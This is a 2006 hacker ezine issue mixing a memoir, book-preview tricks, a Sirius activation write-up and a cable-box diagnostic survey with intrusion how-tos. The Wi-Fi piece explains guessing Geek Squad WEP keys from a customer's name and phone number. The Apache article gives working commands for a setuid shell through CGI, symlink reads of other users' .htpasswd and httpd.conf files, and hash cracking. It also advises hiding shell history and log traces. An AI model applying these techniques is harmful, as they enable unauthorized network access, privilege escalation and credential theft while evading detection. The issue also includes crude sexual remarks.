Copy Link
Add to Bookmark
Report

PoR Issue 04

eZine's profile picture
Published in 
PoR
 · 5 years ago

  

PPPPPPPPPPPPPPPPP RRRRRRRRRRRRRRRRR
P::::::::::::::::P R::::::::::::::::R
P::::::PPPPPP:::::P R::::::RRRRRR:::::R
PP:::::P P:::::P RR:::::R R:::::R
P::::P P:::::P ooooooooooo R::::R R:::::R
P::::P P:::::Poo:::::::::::oo R::::R R:::::R
P::::PPPPPP:::::Po:::::l33t::::::o R::::RRRRRR:::::R
P:::::::::::::PP o:::::ooooo:::::o R:::::::::::::RR
P::::PPPPPPPPP o::::o o::::o R::::RRRRRR:::::R
P::::P o::::o o::::o R::::R R:::::R
P::::P o::::o o::::o R::::R R:::::R
P::::P o::::o o::::o R::::R R:::::R
PP::::::PP o:::::ooooo:::::oRR:::::R R:::::R
P::::::::P o:::::::::::::::oR::::::R R:::::R
P::::::::P oo:::::::::::oo R::::::R R:::::R
PPPPPPPPPP ooooooooooo RRRRRRRR RRRRRRR
/-----------------------------------------------------\
(------------------=PoR Release # 4=--------------------)
\-----------------------------------------------------/

.oO-++++++++++++++-Oo.
.oO MEMBERS Oo.
.oO-++++++++++++++-Oo.
.oO Enamon Oo.
.oO Gonzo Oo.
.oO I-baLL Oo.
.oO Judas Iscariot Oo.
.oO MikeTV Oo.
.oO Murd0c Oo.
.oO Rob T. Firefly Oo.
.oO Scientist Oo.
.oO Sephail Oo.
.oO Venadium Oo.
.oO-++++++++++++++-Oo.


IN THIS ISSUE:

x. Notes From The Editors - Enamon / I-baLL
x. Free Books - Ilya G
x. Meetings - Gonzo
x. Geek Squad Wi-Fi Settings - Murd0c
x. Sirius Notes - Judas Iscariot
x. Scientific Atlanta Explorer 3100 - Hackawelsh
x. A Review of Duane Reade Calling Cards - I-baLL
x. Having Phun with Apache - duper


X---------------------------------------------------------------------------X

NOTES FROM THE EDITORS:

/-----
I-baLL
-----/

So it's July 5th, 2006. It's been almost 1.5 years since the last PoR issue.
That's 1 point 5, not ffifteen. It's warm here in this room but that's
because I closed the window. This sucks. New York City in July and the
weather people are predicting that the weather won't break 90 for the whole
month! I'm not exactly in a writing mood. I'm dehydrated, hairy, and
listening to "Dark Side of the Moon." Writing these intros is my procedure
to get into an editing mood. Night is drawing fast and I'm rambling.
Whatever.

Before I let you guys and gals go I might as well give you some notes, quick
updates, whatever.

The articles below were all submitted over the past year. The information in
them might be a bit outdated but I'm stilll leaving it all in the issue.

Oh, one other thing... HOPE Number Six is coming up on July 21st!

Gonzo and Me are going to be giving a talk on "Weird Technology" on Friday,
in Area B, at 7pm. Be there!

/-----
Enamon
-----/

Due to the lack of time I did not proofread this issue. Our next issue,
however, should be cleaner, neater, and nicer (like some high-priced whore.)

X---------------------------------------------------------------------------X
:
Free Books :
:
Ilya G ;
,,,,,,,,,,,,,;

I've developed a simple method for legally reading books for free over the
Internet. You'll need patience, some free time on your hands, and a Google
user account.

1) First, you'll probably want to go to Amazon.com, search for the book you
want to read, and see if it lets you read the first page with their "Search
inside this book" feature. If you can do this, you're all set to go. Get to
the first page of the book and copy down or memorize a distinct sentence
from the page.

2) Google has a Book Search feature. Go there, type in the book's title and
the sentence you just copied down, and it'll give you that same page. Start
reading. It will allow you to go forward to two additional pages. When you
reach the third (and last) page, copy down a distinct sentence from it and
type that in again. The result will give you that page, and will allow you
to go to two additional pages once again. Keep doing this.

3) After approximately nine pages, you will reach a warning telling you that
you can't see that page. But, you hopefully WILL be able to see the very top
line of that page. Copy it down. You can't read it here, but you can through
Amazon's "Search inside this book" feature. Type in that sentence from the
blocked page into Amazon and read the page there. Once finished, don't read
any further. Amazon's limit is about 40 pages, and you don't want to use
that up. When you finish reading the blocked page from Amazon, look back to
step 2 to return back to Google. That page may be blocked, but it will give
you the next two pages anyway (and you just read that blocked page on Amazon,
so you skipped nothing).

You can keep doing this over and over, going through an entire book. If
Google decides to stop you (hasn't happened to me yet), you always have
Amazon to go back to and keep reading. If you reach Amazon's limit of how
many pages you can read, it will be reset after about a week. Also, if you
have a Gmail account, you should have a giant load of "invites" (I have 100),
which you can give to yourself and create extra Google accounts to keep
reading. Sure, it might take time with all the copying and pasting, but at
least you can read an entire book over the internet, and it's perfectly
legal. All you're doing is abusing the system, not breaking it.

X---------------------------------------------------------------------------X
:
Meetings :
:
Gonzo ;
,,,,,,,,,,,;


In those days, my L.O.S. days, it was something we had talked about. Sure,
we knew about 2600, and its meetings, but we never went. I'm not even sure
if N.J. Transit's "Midtown Direct" service was around then, so even if we
would've gone in, I'm not sure how we would've done it. Looking back at it
now, we should have.

After L.O.S. disbanded, I kept up with things, and did what I could. One
night, I was watching a t.v. program about hackers, and it mentioned Off
The Hook. I made it a point to check out the show. Many blissful nights
were spent on my bedroom floor listening. Then, I heard some thing
mentioned about an upcoming conference called "Beyond H.O.P.E." I had to
go, and I did.

I remember calling N.J. Transit's customer service, and was told that there
is, in fact, a way to go directly into Manhattan. This was my way home.
Getting in was no problem, either. My friend, Rachael, had to go to the
Village to do some shopping, and she gave me a lift in. I was a bit nervous
while I was walking to the corner of Lafayette and Houston, and into the
Puck Building.

I felt incredibly out of sorts there. I was alone, knew no else there, and
had no idea what to expect. I roamed around for a bit in the vendors' area,
and saw someone selling books, and one of them was Jim Keith's Black
Helicopters Over America. That was Bob The Bopper a.k.a. in the N.Y.C 2600
meeting as "Conspiracy Bob." I was into conspiracies and learning about the
evils of Big Brother and the N.W.O. I talked with some chick that worked on
"Steal This Radio." I played the Double Dragon game that was there, and I
even remember seeing Phiber Optik standing in line to buy a Major Hacking
cookie. I left later in the day. Standing out in front, waiting for a cab,
I met someone else, Skarecrow, and we're still friends to this day. Then,
I heard a two-way radio go off. It was someone doing security, and there
was an announcement that someone was jamming the live broadcast of Off The
Hook. Some scrawny guy with glasses started running all over the area
looking into car windows and around corners to see what was going on. That
was Rebel. We weren't then, nor are we now, friends. A whole new world had
opened in front of me, and I HAD to walk in.

In October of that year, '97, I went to my first 2600 meeting. I wasn't
alone, though. At the time, there was someone else I was trying to teach
about hacking, and it later turned out to be a waste of my time, but at
least I had someone else there. I was hoping to see a familiar face, but
none were to be seen. My then friend and I were standing outside of the
then known Citicorp Building. I can't even remember what we were talking
about, but I heard a voice.

"You're new here, aren't you?"

That was Lupus. He, and his friends whose names I can't remember introduced
themselves, and brought us into the conversation. I talked about the group
I was in, and was surprised that others remembered us. That was the day I
learned about cloning a cell phone. Lupus left early, for some reason.

"Someday, the body will be the ultimate hack" he said over his shoulder to
me as he headed up to the corner. I never saw him again.

I had no idea what I had just gotten myself into. The meetings became, and
are still, so important to me that I would social engineer my way into
leaving early on the first Friday of the month just so I could go in.

I haven't missed a meeting since '99, and my head spins when I think about
all that's happened, all the scrapes with feds, drugs, roaming around in
Barnes and Noble, holding court in restaurants, meeting Kevin Mitnick twice,
conferences, 9/11, and vast characters of those came, and those who stayed.
I have overly strained relations with my biological family, so 2600 has
become my chosen family. Family, or, more appropriately, chosen family is
something I learned the importance of a long time ago and family is one of
the dearest things to me. God only knows how many times they have been there
for me, and I don't think I'll ever be able to properly show my gratitude.

It's not surprising that I get nostalgic often when I think about the times
I've had, like coming back to Dover on an insanely quiet summer night, and
listening to Art Bell, and every other things that's happened to me that I
fall in love with over and over again. I even have a hacker pop culture
ritual that I do just so I'll be in the right mindset for this long
download, and I won't click "Cancel"


X---------------------------------------------------------------------------X
:
Geek Squad Wi-Fi Settings :
:
Murd0c ;
,,,,,,,,,,,,,,,,,,,,,,,,,,,,;


Have you ever been sitting around in your house, or your friends house, or
even some crazy member of your family's house and not have any internets at
all? I've came across a little someting that will help you get wifi a little
easier. Now, I must stress this is only from my personal experience and it
might not work for you.

Now, since lots of people don't know how to set up wireless routers, they
usually leave it to 'the professionals'. Really, they leave it up to Best
Buy's Geek Squad. From what I've learned, Geek Squad sets up the routers
like this.

SSID = Last name of the customer
WEP (almost always WEP) = Customer's home telephone number

So, say you're sitting at your friend's house and you see an encrypted
network with the SSID of "Davidson". Fire up Google and do a search for
Davidson + town you're in. This should, usually yield an entry somewhat in
proximity to where you're at, either on your street or one over.

I've tried this out a few times in various parts of the country and it
hasn't failed me yet. Perhaps this will entice Best Buy to stop being so
fucking stupid when programming their routers.

P.S.: This article is so crappy because it's last minute stuff. Sorry :(


X---------------------------------------------------------------------------X
:
Sirius Notes :
a.k.a. :
Sirius Satellite Radio Activation Process Bamboozala 2006 :
:
Judas Iscariot :
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,;


So 2006 is upon us. No more wardrobe malfunctions, P Diddy-name
annexations, or lip-synching performances on Saturday Night Live. With a
new year, brings us new technology. Sirius Satellite Radio and Howard Stern
want YOU to join the digital army, and abandon terrestrial radio altogether.
No commercials, no FCC, and tons of categorized channels and styles, and for
your audible please for a nominal fee!

I've decided to write this article not in the sense of "h3r3's t3h h4x!!"
but more of the traditional info-spective. I recently came to acquire a
Sirius car kit with stylish receiver (mmm....blue LEDs!). I ran through the
new customer activation over the 800 number as opposed to internet ordering.
After completing the process I sat testing out the new receiver going over
in my mind the underpaid, inbound, telemarketers script. The entire
activation process flowed through my cranium searching out the pieces to how
the system works. Kind of a shoot-from-the-hip technologically rooted
theory. With that, I present to, the Sirius Satellite Radio Activation
Process Bamboozala 2006!

After calling the 1-800 activation number, an IVR comes up stating with the
recent holidays, they are experiencing and influx of callers and hold times
are currently in an extended period. I was immediately dropped to a
horrible, faint, stream of the country channel. I'm guessing whoever set up
the box they running that off of either has the encoding waaay to low (along
with the volume), or the phone system was acting up. 30 minutes later I was
greeted by a man named Raul. I told him I wished to activate my ubercool
new radio. He proceeded to rape my docs and I had to give him my name,
address and email address for which I declined (SPAM!). Raul then asked for
a very important piece of information. The way the receivers are activated
are by a 12 digit Sirius ID (SID) number. Any hacker worth his salt will
tell you this will be the first thing to attack. Take your mac address
spoofing skills from your college Comp Sci class and apply it to the SID.
You may be asking "How the phuck do I do that?" I don't know! Truthfully,
I don't know **** about radio freqs and the such, so I did some searching
and found this guy who thinks he knows what he is talking about.

drktitan56 writes "SIRIUS uses a QPSK (Quad-rature Phase Shift Keying)
for its modulation scheme. If you look around on the internet you can
get the schematics for a QPSK (four level) decoder and you can get all
the parts to make one from Radio Shack for about $10. The frequency for
SIRIUS is 2.32 Ghz and the signal bandwidth is 12.5 Mhz for the whole
system. The QPSK will not work if the receiver you have uses the TDM
(Time Division Multiplexing)."

So, is this the way to decode the signal and possibly recreate it with
spoofed info thereby allowing you free 0-day spl0itz? Possibly. I'm simply
providing the inf0z possibly inspiring some poor ham to start experimenting.

The rest of the activation process was mostly more raping of the d0cz,
setting up a sirius.com user name and password, and setting up a payment
plan. Nothing else technical was done except when they send you the magic
"activation signal". Your receiver grabs an update from the signal and
starts to load the channels into the unit. Nothing shady about that. All
in all, the main weakness lies in the SID. I've looking into getting the
company to clone my SID into a separate unit that I would purchase, but they
told me this could not be done. Only secondary units can be added onto the
account for a lesser fee per month. The billing system lists all registered
radios under each customer account. While this doesn't help in getting free
service, it's still a cool fact none the less.

How do you get free satellite radio? I don't know. As I said previously
stated in my opening (loalz, in my...forget it) I am simply giving
information, purely from a skeptical consumers points of view. Mostly I
want to light some fires under people's asses so this new technology can be
explored. ­Fel¡z a¤o nuevo!


X---------------------------------------------------------------------------X
:
Scientific Atlanta Explorer 3100 :
:
Hackawelsh :
Inspired by Judas Iscariot :
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,;

SCIENTIFIC research in the ATLANTA Georgia area shows that _3100_ is a
number...
By Hackawelsh
Inspired by Judas Iscariot

[A: COPYRIGHT HACKAWELSH 2005: HOT GIRL LICENSE]-----
I don't give a shit what you do with this document, however, if you are
a hot girl, by reading this, you consent to any number of sexual
activities I may desire to engage in with you, should we ever meet at a con,
or in a dark alley.

[B: DISCLAIMER]--------------------------------------
I don't know shit about fuck when it comes to hardware, so most of this
crap is being pulled out of my ass, and other orifices.

[1: Narrative/rambling intro]------------------------
Fucking cable's out. The little LED display on my the front shows
random numbers, instead of the time. Bastards. Called them up the other
day, said they couldn't fix the problem from there HQ. They had to send
someone out today. He couldn't fix it either - said they have to run
new lines to the house.

One plus, however; I noticed how the cable tech was entering debug mode
on this particular box, so I did a little exploring of my own. Note
that because my cable was out the fruits of my labor may be more or less
ripe than your own.

[2: Accessing Debug Mode]----------------------------
Accessing debug mode is no major secret, it's similar to the older
boxes documented on dslreports [1]. All you do is hold down the "diamond
button" (the one in the middle of the arrow keys) on the front panel
of the cable box until the little envelope LED lights up, at which point
you press info.

Congratulations, step one of Gibson Hacking is complete.

Navigating through the system is fairly straight forward with the arrow
keys on the box. The tech d00d was able to press a sequence on the
remote and navigate using the remote, but I didn't catch what he pressed
and was unable to reproduce such results.

[3: Linux Potential]---------------------------------
"he Explorer DHCT features a 32-bit, 130 MHz RISC microprocessor; an
Internet Protocol-based, real-time reverse path DAVIC transmitter; and an
out-of-band control channel that can support interactive or
session-based services." [4]

To me "130 MHz RISC microprocessor" means this thing is screaming for
someone much more leet than myself (there are very few people that fit
this description, however) to run Linux on this thing.

But I'm sure someone could install Linux on a Tamagotchi if they wanted
to so that's not really that cool...

[4: Hax0ring Their N3tw0rk]--------------------------
Page 3 of the diagnostics mode was what I found to be most interesting.
They have the mac addresses of 4 devices. Three of them had the same
prefix: 00:02:DE, which, after a quick lookup on coffer.com [3], I was
able to find were produced by Astrodesign Inc. These three MACS were
E-MAC, RF-MAC (these two were sequential) and ISE. The fourth MAC,
labeled ESE was showing up "Unavailable." I believe that ISE means
"Internal Something or Other" and ESE means "External Something or Other",
and if I had service it would show the MAC address of a host of gateway
system of some kind.

I was surprised the prefix was not Sci At, but I did a little digging
on Astrodesign Inc (some Japanese company) and I don't think Scientific
Atlanta makes this kind of product. A little research was able to turn
up a PCI Board they make that smells like it could be the one in the
SA3100 [6]. Here's why I thought that:

"The board can be used for transmission of data contents for digital
broadcasting, as well as for input, output, and/or multiplexing of
transport streams from different types of hardware that use digital
broadcasting/communication transport streams."

I was unable to find anyone working with these boards on Linux, despite
their PCI-ness, and the potentially k-rad sploits. In case none of
what I'm incoherently rambling about is coming together in your noodle,
I'm wondering aloud (well in text, but STFU) whether or not someone could
get on the digital cable network through their PC if they had one of
these cards and some mad RE/driver writing skillz (I assume the specs are
not openly available).

[5: Fin]---------------------------------------------
That's all for now. I busted my ass on a nice summary of the
diagnostic pages, so Czech those out too, man.

[APPENDIX A: DIAGNOSTIC PAGE SUMMARY]----------------
The dslreports page has nice pictures of these screens, but they are
not of the 3100 and are slightly different. Among the differences, the
3100 has more pages (16) than the box they refer to.

Note: this was compiled while I had no cable service, results may vary.
I. STATUS SUMMARY
A. INITILIZATION
1. Status
2. CPU/Bus
3. Ev Pool
B. MEMORY (table)
1. ROWS
a. Total
b. Free
c. Largest
d. Chunks
2. COUMNS
a. System Heap
b. SARA Heap
c. Video Heap
C. RF PARAMETERS
1. Tuner
2. FDC
3. RDC
D. CLOCKS
1. Booted
2. Current
II. POST AND BOOT RESULTS
A. (Not Applicable)
1. Note: I believe if you have a working cable connection
this would be different
B. BOOT STATUS
1. UNcfg
2. BFS
3. SI
4. SAM
5. IPG
6. PowerKEY
III. NOT TITLE
A. SOFTWARE VERSIONS
1. PTV OS
2. FLASH
3. App(s)
B. HARDWARE MODULES
1. HWConfig
2. BIP
3. AC3
4. BGATE
5. BCOM
6. TVP
7. RFModem
8. MAC
9. QPSKRX
10. QPSKTX
11. ISE
12. ESE
13 DDS
C. SERIAL NUMBERS
1. E-MAC
2. RF-MAC
a. Note: in my experience E-MAC and RF-MAC are
sequential mac addresses
3. ISE
4. ESE
IV. NO TITLE
A. STATUSES
1. Tuning Mode
2. Tuner State
3. TV Mgr
4. TV Res Err
5. Tuning Tbl
6. Channel
7. Souce Id
8. BFS Dir
B. ETHERNET
1. IP
2. Subnet Mask
C. RF NETWORK
1. IP
2. SUBNET MASK
3. Hub ID
D. MPEG STATS
1. Video
2. Audio
` 3. PCR
4. PCR Lock
5. A/V Disc
6. PTS
7. PEI
8. PER
9. SER
10. RST
E. ENTITLEMENT AGENTS
1. ISE[1]
V. NO TITLE
A. CURRENT FDC
1. Freq
2. DAVIC
3. Status
4. Level
5. Seconds
6. Corr Bytes
7. Uncor Blks
8. Errs Avg/Inst
9. Total Bytes S/N
B. CURRENT RDC
1. Freq
2. Power
3. Delay
4. Retrans
C. CURRENT QAM
1. Freq
2. Tuning Mode
3. Status
4. Level
5. S/N
6. Seconds
7. Corr Bytes
8. Uncor Blks
9. Errs Avg/Inst
10. EQ Gain
VI. POWERKEY INFORMATION
A. NO SUBSECTION TITLE (table)
1. ROWS
a. EMMs
b. Time GBAMs
c. App GBAMs
d. Ext GBAms
e. EMCs

2. COLUMNS
a. Recieved
b. ISE
c. ESE
D. NO SUBSECTION TITLE (table)
1. ROWS
a. ISE
b. Comm
c. Version
2. COLUMNS
a. Errors
b. Cmd/Err
c. Date.Time
E. NO SUBSECTION TITLE
1. Version
2. Prog Stat
3. Prog Entitle
4. Decrypt Stat
5. late Keys
6. Sub Expires
7. CA Time
8. EUT Update
9. Decrypt Fail
10. Last Late Key
VII. IPPV INFORMATION
A. NO SUBSECTION TITLE
1. ROWS
a. Prch GBAMs
2. COLUMNS
a. Received
b. ISE
c. ESE
B. LAST ATTEMPTED
1. Device
2. EID
3. Result
4. Time
C. LAST SUCCESS
1. EID
2. Time
D. NO SUBSECTION TITLE
1. FPM Poll
2. PPV Collect
VIII. QPSK SIK INFORMATION
A. RECEIVE STATISTICS (table)
1. ROWS
a. CA
b. Broadcast
c. DNCS
d. DAVIC
e. PassThru
f. OOB SI
2. COLUMNS
a. Ctrl
b. VPI
c. VCI
d. Off
e. Ovfl
f. Packets
B. TRANSMITTED PACKETS (table)
1. ROWS
a. Slotted Aloha
b. TDMA
b. Resevation
c. Ranging
d. Errors
2. COLUMNS
a. DAVIC
b. SA/RES
c. TDMA
IX. PPV SERVICE SUMMARY
A. PPV SERVICE
1. State
2. PPC Svc
3. Interstitial
4. Index Ver
5. Immed Ver
6. Event Svc
B. PPV EVENT
1. Title
2. Svc Index
3. EID
4. Secure Buy
5. Event
6. Advertise
7. Preview
8. Cancel End
9. GBAM
X. DIGITAL VIDEO STATUS
A. NO SUBSECTION TITLE
1. Freq
2. Tuning Mode
3. TV Mgr
4. Uncor Blks
5. Seconds
6. Level
7. Channel
8. BFS Dir
B. NO SUBSECTION TITLE (table)
1. ROWS
a. Free
b. Largest
2. COLUMNS
a. System Heap
b. Video Heap
C. NO SUBSECTION TITLE (table)
1. ROWS
a. ISE
2. COLUMNS
b. Errors
c. Cmd/Err
d. Date.Time
3. Sub Expires
D. NO SUBSECTION TITLE
1. ISE
2. Late Keys
3. FPM Poll
4. A/V Disc
5. PEI
6. Last Late Key
7. Decrypt Fail
8. PER
9. PTS
10. SER
11. RST
XI. VOD INFORMATION
A. Service Group
B. SI Received
C. Int
D. Ext
E. TABLE
1. COLUMNS
a. State
b. Session
c. Entitlement
d. Stat
e. Activated
XII. BOOTLOADER INFORMATION
A. Vendor ID
B. HW Model
C. HW Version
D. Bldr Version
E. Group ID
F. Image ID
G-J. Word 1-4
K. NVM Writes
XIII. SAM INFORMATION
A. DOWNLOADED APPS
B. ACTIVE SERVICES
XIV. SARA INFORMATION
A. Global Cfg
B. Addreessed Cfg
C. IPG Daemon
D. EAS
XV. QAM CHANNEL STATUS (table)
A. ROWS
1. NOTE: Rows are simply numbered 1-15
B. COLUMNS
1. Chan
2. % Full
3. Pkts RX
4. Pkts Avail
5. Overflows
6. Seconds
XVI. QPSK CHANNEL STATUS (table)
A. ROWS
1. NOTE: Rows are simply numbered 8-19
B. COLUMNS
1. Chan
2. % Full
3. Pkts RX
4. Pkts Avail
5. Overflows
6. Seconds

[WORKS CITED]----------------------------------------
[1] dsl reports' SCI AT Hardware FAQ:
http://www.dslreports.com/faq/sciatl/3.1%20Using%20diagnostic%20screens
[2]
That t-file judas wrote for some zine:
http://www.thesearenotthedroidsyourelook.info/porissue3.txt
[3]
Coffer.com MAC Address Vendor Lookup: http://coffer.com/mac_find/
[4] Sci At
Consumer Products: 2100/3100:
http://www.scientificatlanta.com/products/consumers/Exp2100or3100.htm
[5]
(OUTDATED) Sci At Spec Sheet on the 3100:
http://sciatl.com/customers/Source/745880.pdf
[6] Astrodesigns
Multi-type PCI Board Product Inf0z:
http://www.astrodesign.co.jp/en/product/catalog/cx570e.html


X---------------------------------------------------------------------------X
:
A Review of Duane Reade Calling Cards :
:
I-baLL :
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,;


If you drop by your local Duane Reade drug store you'll see this rotating
stand filled with cards. Pre-paid credit cards, some other cards, plus Duane
Reade calling cards. As a spur-of-the-moment buy I bought me the calling
card.

The card that I bought has 500 minutes on it. I don't remember what it cost
me though but that's not that important. The card is kinda weird. The front
of the card says "Duane Reade" (obviously), but then it also says "BellSouth
Prepaid Phone Card", "Powered by Fast Card", and, on the back of the card,
it says: "Services provided by: U.S. South".

Anyways, the number to call to use the card is: 1-800-445-9268 (or, for
Spanish, 1-800-450-0530). You then enter your pin number (on my card the pin
is written in the following format: xxx xxx xxxx), and then a voice prompt
says to enter 1 for calls in the U.S., the Carribean and Virgin Islands,
basically all the places where the country code is 1+. Then it says to dial
011 for all other places. Whatever.

Here's the scoop on what's so good about the cards:

They pass no CPN.
They pass an ANI of 404-806-2699 (an Alabama, Georgia exchange)
They allow you to dial toll-free numbers (though those do take up minutes.)

Seeing how the BellSouth is one of the names listed on the card I decided to
call up 1-800-BellSouth to see if the calling card passed any of my
information on the Bell South network. The friendly Bell South operator told
me that they were seeing the number as originating from 404-806-2699. That
meant that none of my docs were being passed.

So, overall, the card's not too bad. It's rechargeable (though I don't know
if you can use cash to do that), and you can make more calls without hanging
up by hitting the # key twice (a common feature on most calling cards.)


X---------------------------------------------------------------------------X
:
Having Fun With Apache :
:
duper :
,,,,,,,,,,,,,,,,,,,,,,,,;


Ever wanted to access local apache resources but wasn't exactly sure
how? If so, then keep reading.. this article is for you! :-) The
following techniques assume that you have a local user account on the
machine where the Apache httpd daemon is running.

Typically, apache runs under its own user/group. These are configured by the
User and Group directives respectively in the httpd.conf file. By default,
apache executes CGI scripts as itself. Therefore, a user that can create their
own CGI scripts can probably execute arbitrary commands as the apache
user. If you have write access to a directory that has the ExecCGI
option enabled in httpd.conf, then creating a set-id shell binary should
be easy enough. First, prevent your shell history file from being
written to cover your tracks. Execute something similar to the following
beforehand:

bash$ export HISTFILE=/dev/null
tcsh> unset histfile

Reefer to teh man page for your specific shell. We'll print out the HTTP
Content-type so there isn't a "premature end of script headers" message
stored in the httpd error_log. Something like that might attract
attention.

$ id
uid=101(duper) gid=101(duper)
$ pwd
/home/duper
$ #ExecCGI UserDir
$ cat>public_html/test.cgi
#!/bin/sh
/bin/cp /bin/sh ~
/bin/chmod 6751 ~
/bin/echo Content-type: text/html
/bin/echo
/bin/echo
$ chmod 0755 ~/public_html/test.cgi
$ lynx -dump http://localhost/~duper/test.cgi



$ ./sh
$ id
uid=81(apache) gid=81(apache)
$

Of course, this trifle can be avoided by configuring suexec or disabling
CGI altogether, but if you aren't permitted to execute CGI scripts,
don't fret, there are other ways to access apache files, just yet;
recognize, the age-old symlink trick is still in full effect! Simply
make a symbolic link to the desired file from your public_html
directory and view it in a web browser. Give the link an innocuous name
since an entry will be created in the server access_log.

This technique can be used to read any file the apache user has
access to. For instance, .htpasswd files that contain the encrypted
passwords for HTTP authentication--Crack the DES/MD5 hashes with john.
If you want to read another user's .htpasswd file:

$ ln -s ~user/public_html/.htpasswd ~/public_html/index2.html
$ lynx -dump http://localhost/~$USER/index2.html

Again, Apache can be reconfigured to more stringently handle symbolic links.
Adding the directives +SymLinksifOwnerMatch and -FollowSymLinks to
the UserDir's Directory definition should stop such behavior. However, a
subtle variation of the symlink maneuver can circumvent the security
these directives are meant to imply. Observe that it is possible to use
the public_html directory itself as a target for the symbolic link.
So, if we don't have permission to read the server configuration file,
we have:

$ mv ~/public_html ~/public_html.tmp
$ ln -s /etc/httpd/conf/httpd.conf ~/public_html
$ lynx -dump http://localhost/~$USER

[...]

This can be real phun if the usual directory Indexes directive is enabled
That way, you can set the source of the symbolic link to the conf
(or any other) directory and decide which apache-owned files you
want to read for yourself..but don't forget the access log is keeping a
record of the name of every symbolic link you're viewing. Page through
your local httpd.conf file for more goodies to gather. Have phun.

<don-o> tomwsmf: have you passed the heliopause and entered outer space?
<tomwsmf> Hail Jaurez full of bitz, thine zer0dayz are with ye


X---------------------------------------------------------------------------X
X---------------------------*-----*-----*-----------------------------------X
X---------------------------------------------------------------------------X
X---------------------------------------------------------------------------X
X-------------------------------------SEND ALL ARTICLE SUBMISSIONS TO:------X
X---------------------------------------------------------------------------X
X----PATTERNSOFRECOGNITION(AT)YAHOO.COM-------------------------------------X
X---------------------------------------------------------------------------X
X---------------------------------------------------------------------------X
X-------------------------------------OUR SITE IS:--------------------------X
X---------------------------------------------------------------------------X
X----HTTP://THESEARENOTTHEDROIDSYOURELOOK.INFO------------------------------X
X---------------------------------------------------------------------------X
X---------------------------------------------------------------------------X
X---------------------------------------------------------------------------X
X--------------------------------F------------------------------------------X
X---------------------------------I-----------------------------------------X
X----------------------------------N----------------------------------------X

← previous
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT